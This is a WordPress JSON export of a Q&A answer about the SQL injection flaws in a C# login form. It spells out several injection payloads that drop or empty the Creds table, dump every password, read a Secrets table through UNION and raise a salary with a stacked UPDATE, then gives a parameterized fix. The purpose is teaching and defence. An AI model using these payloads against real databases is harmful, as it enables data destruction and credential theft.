{"id":3984,"date":"2022-08-21T01:32:52","date_gmt":"2022-08-20T20:02:52","guid":{"rendered":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/"},"modified":"2022-08-21T01:32:52","modified_gmt":"2022-08-20T20:02:52","slug":"solved-how-to-expose-the-weakness-of-bad-code-closed","status":"publish","type":"post","link":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/","title":{"rendered":"[Solved] How to expose the weakness of bad code [closed]"},"content":{"rendered":"

[ad_1]
\n<\/p>\n

\n
\n
<\/div>\n
\n
\n

Many a great thing can be performed:<\/p>\n

Destruction<\/strong>: put *' or 1 = 1; drop table Creds --<\/code> into textBox1.Text<\/code> and the query will be<\/p>\n

 select * from Creds where Username=\"*\" or 1 = 1;\n drop table Creds -- and Password=''\n<\/code><\/pre>\n
you have two<\/em> queries; the second one drops creds<\/code> table<\/p>\n
Deletion<\/strong>: put *' or 1 = 1; delete from Creds --<\/code> into textBox1.Text<\/code> and the query will be<\/p>\n
 select * from Creds where Username=\"*\" or 1 = 1;\n delete from Creds -- and Password=''\n<\/code><\/pre>\n
you have two<\/em> queries; the second one clears creds<\/code> table<\/p>\n
Espionage<\/strong>: put ' \/*<\/code> into textBox1.Text<\/code> and *\/ or '*' = '*<\/code> into textBox2.Text<\/code> and the query will be<\/p>\n
 select * from Creds where Username=\" \" \/*  and Password= '*\/ or '*' = '*'\n<\/code><\/pre>\n
this query returns all the users with their passwords. Start monitor\/sniffer and read the values returned. Do you want some data from other table? Just put
\n' union all select SecretField, TopSecretField from Secrets --<\/code> into textBox2.Text<\/code> and you’ll get<\/p>\n
select * from Creds where Username=\"\" and password = ''\nunion all\nselect SecretField, TopSecretField from Secrets --'  \n<\/code><\/pre>\n
Hack<\/strong>: can you see a record “Big boss”, “Top secret password”? It’s very time to login with this
\n      username\/password and put
\n      *' or 1 = 1; update Creds set salary = 1000000 \/*be modest*\/ where userName=\"PoorLittleMe\"--<\/code> into textBox1.Text<\/code>
\n      and the query will be<\/p>\n
  select * from Creds where Username=\"*\" or 1 = 1;\n  update Creds set salary = 1000000 \/*be modest*\/ where userName=\"PoorLittleMe\" -- and Password=''\n<\/code><\/pre>\n
again, you have two queries, and it’s quite easy to guess what does the second query do; you may want to buy a ticket to Argentina then.<\/p>\n
Trick<\/strong>: register youself as d'Artagnan<\/code>; such a name being perfectly right when put into query  <\/p>\n
select * from Creds where Username=\"d\"Artagnan' and Password='mypassword'\n<\/code><\/pre>\n
will cause a syntax error<\/em> (and most probably resourse leakage<\/em> – you haven’t wraped IDisposable<\/code> – Connection<\/code>, Command<\/code>, Reader<\/code> into using<\/code>)<\/p>\n
Finally<\/strong>, how it should have been done<\/em>:<\/p>\n
   \/\/ wrap IDisposable into using\n   \/\/ do not hardcode the connection string\n   using (SqlConnection con = new SqlConnection(\/*read the connection string here*\/)) {\n     con.Open();\n\n     \/\/ Make Sql being readable \n     \/\/ You don't want at least Username field to be returned (you have in textBox1.Text)\n     string sql = \n       @\"select Permissions, --TODO: put right fields here\n                Status\n           from Creds\n          where PasswordHash = @prm_PasswordHash and -- do not store password as plain text\n                Username = @prm_UserName\"; \n\n     \/\/ wrap IDisposable into using\n     using (SqlCommand cmd = new SqlCommand(sql, con)) {\n       \/\/ do not store password as a plain text, but as a hash\n       \/\/TODO: AddWithValue is not the best choice; put actual parameters' types here \n       cmd.Parameters.AddWithValue(\"@prm_PasswordHash\", ComputeHash(textBox2.Text));\n       cmd.Parameters.AddWithValue(\"@prm_UserName\", textBox1.Text);\n\n       using (dr = cmd.ExecuteReader()) {\n         while (dr.Read()) {\n           ...\n         }\n       } \n     }\n   }\n<\/code><\/pre>\n<\/p><\/div>\n
<\/div>\n<\/div>\n
            2<\/span> <\/p><\/div>\n<\/div>\n
[ad_2]<\/p>\n
solved How to expose the weakness of bad code [closed] <\/p>\n","protected":false},"excerpt":{"rendered":"
[ad_1] Many a great thing can be performed: Destruction: put *’ or 1 = 1; drop table Creds — into textBox1.Text and the query will be select * from Creds where Username=”*” or 1 = 1; drop table Creds — and Password=” you have two queries; the second one drops creds table Deletion: put *’ … Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[320],"tags":[324,343],"class_list":["post-3984","post","type-post","status-publish","format-standard","hentry","category-solved","tag-c","tag-sql-injection"],"yoast_head":"\n[Solved] How to expose the weakness of bad code [closed] - JassWeb<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[Solved] How to expose the weakness of bad code [closed] - JassWeb\" \/>\n<meta property=\"og:description\" content=\"[ad_1] Many a great thing can be performed: Destruction: put *' or 1 = 1; drop table Creds -- into textBox1.Text and the query will be select * from Creds where Username="*" or 1 = 1; drop table Creds -- and Password='' you have two queries; the second one drops creds table Deletion: put *' ... Read more\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\" \/>\n<meta property=\"og:site_name\" content=\"JassWeb\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-20T20:02:52+00:00\" \/>\n<meta name=\"author\" content=\"Kirat\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Kirat\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\"},\"author\":{\"name\":\"Kirat\",\"@id\":\"https:\/\/jassweb.com\/solved\/#\/schema\/person\/65c9c7b7958150c0dc8371fa35dd7c31\"},\"headline\":\"[Solved] How to expose the weakness of bad code [closed]\",\"datePublished\":\"2022-08-20T20:02:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\"},\"wordCount\":200,\"publisher\":{\"@id\":\"https:\/\/jassweb.com\/solved\/#organization\"},\"keywords\":[\"c++\",\"sql-injection\"],\"articleSection\":[\"Solved\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\",\"url\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\",\"name\":\"[Solved] How to expose the weakness of bad code [closed] - JassWeb\",\"isPartOf\":{\"@id\":\"https:\/\/jassweb.com\/solved\/#website\"},\"datePublished\":\"2022-08-20T20:02:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jassweb.com\/solved\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[Solved] How to expose the weakness of bad code [closed]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jassweb.com\/solved\/#website\",\"url\":\"https:\/\/jassweb.com\/solved\/\",\"name\":\"JassWeb\",\"description\":\"Build High-quality Websites\",\"publisher\":{\"@id\":\"https:\/\/jassweb.com\/solved\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jassweb.com\/solved\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jassweb.com\/solved\/#organization\",\"name\":\"Jass Web\",\"url\":\"https:\/\/jassweb.com\/solved\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jassweb.com\/solved\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/jassweb.com\/wp-content\/uploads\/2021\/02\/jass-website-logo-1.png\",\"contentUrl\":\"https:\/\/jassweb.com\/wp-content\/uploads\/2021\/02\/jass-website-logo-1.png\",\"width\":693,\"height\":132,\"caption\":\"Jass Web\"},\"image\":{\"@id\":\"https:\/\/jassweb.com\/solved\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/jassweb.com\/solved\/#\/schema\/person\/65c9c7b7958150c0dc8371fa35dd7c31\",\"name\":\"Kirat\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jassweb.com\/solved\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/jassweb.com\/solved\/wp-content\/litespeed\/avatar\/1261af3c9451399fa1336d28b98ea3bb.jpg?ver=1776403586\",\"contentUrl\":\"https:\/\/jassweb.com\/solved\/wp-content\/litespeed\/avatar\/1261af3c9451399fa1336d28b98ea3bb.jpg?ver=1776403586\",\"caption\":\"Kirat\"},\"sameAs\":[\"http:\/\/jassweb.com\"],\"url\":\"https:\/\/jassweb.com\/solved\/author\/jaspritsinghghumangmail-com\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[Solved] How to expose the weakness of bad code [closed] - JassWeb","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/","og_locale":"en_US","og_type":"article","og_title":"[Solved] How to expose the weakness of bad code [closed] - JassWeb","og_description":"[ad_1] Many a great thing can be performed: Destruction: put *' or 1 = 1; drop table Creds -- into textBox1.Text and the query will be select * from Creds where Username=\"*\" or 1 = 1; drop table Creds -- and Password='' you have two queries; the second one drops creds table Deletion: put *' ... Read more","og_url":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/","og_site_name":"JassWeb","article_published_time":"2022-08-20T20:02:52+00:00","author":"Kirat","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Kirat","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/#article","isPartOf":{"@id":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/"},"author":{"name":"Kirat","@id":"https:\/\/jassweb.com\/solved\/#\/schema\/person\/65c9c7b7958150c0dc8371fa35dd7c31"},"headline":"[Solved] How to expose the weakness of bad code [closed]","datePublished":"2022-08-20T20:02:52+00:00","mainEntityOfPage":{"@id":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/"},"wordCount":200,"publisher":{"@id":"https:\/\/jassweb.com\/solved\/#organization"},"keywords":["c++","sql-injection"],"articleSection":["Solved"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/","url":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/","name":"[Solved] How to expose the weakness of bad code [closed] - JassWeb","isPartOf":{"@id":"https:\/\/jassweb.com\/solved\/#website"},"datePublished":"2022-08-20T20:02:52+00:00","breadcrumb":{"@id":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/jassweb.com\/solved\/solved-how-to-expose-the-weakness-of-bad-code-closed\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jassweb.com\/solved\/"},{"@type":"ListItem","position":2,"name":"[Solved] How to expose the weakness of bad code [closed]"}]},{"@type":"WebSite","@id":"https:\/\/jassweb.com\/solved\/#website","url":"https:\/\/jassweb.com\/solved\/","name":"JassWeb","description":"Build High-quality Websites","publisher":{"@id":"https:\/\/jassweb.com\/solved\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jassweb.com\/solved\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/jassweb.com\/solved\/#organization","name":"Jass Web","url":"https:\/\/jassweb.com\/solved\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jassweb.com\/solved\/#\/schema\/logo\/image\/","url":"https:\/\/jassweb.com\/wp-content\/uploads\/2021\/02\/jass-website-logo-1.png","contentUrl":"https:\/\/jassweb.com\/wp-content\/uploads\/2021\/02\/jass-website-logo-1.png","width":693,"height":132,"caption":"Jass Web"},"image":{"@id":"https:\/\/jassweb.com\/solved\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/jassweb.com\/solved\/#\/schema\/person\/65c9c7b7958150c0dc8371fa35dd7c31","name":"Kirat","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jassweb.com\/solved\/#\/schema\/person\/image\/","url":"https:\/\/jassweb.com\/solved\/wp-content\/litespeed\/avatar\/1261af3c9451399fa1336d28b98ea3bb.jpg?ver=1776403586","contentUrl":"https:\/\/jassweb.com\/solved\/wp-content\/litespeed\/avatar\/1261af3c9451399fa1336d28b98ea3bb.jpg?ver=1776403586","caption":"Kirat"},"sameAs":["http:\/\/jassweb.com"],"url":"https:\/\/jassweb.com\/solved\/author\/jaspritsinghghumangmail-com\/"}]}},"_links":{"self":[{"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/posts\/3984","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/comments?post=3984"}],"version-history":[{"count":0,"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/posts\/3984\/revisions"}],"wp:attachment":[{"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/media?parent=3984"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/categories?post=3984"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jassweb.com\/solved\/wp-json\/wp\/v2\/tags?post=3984"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}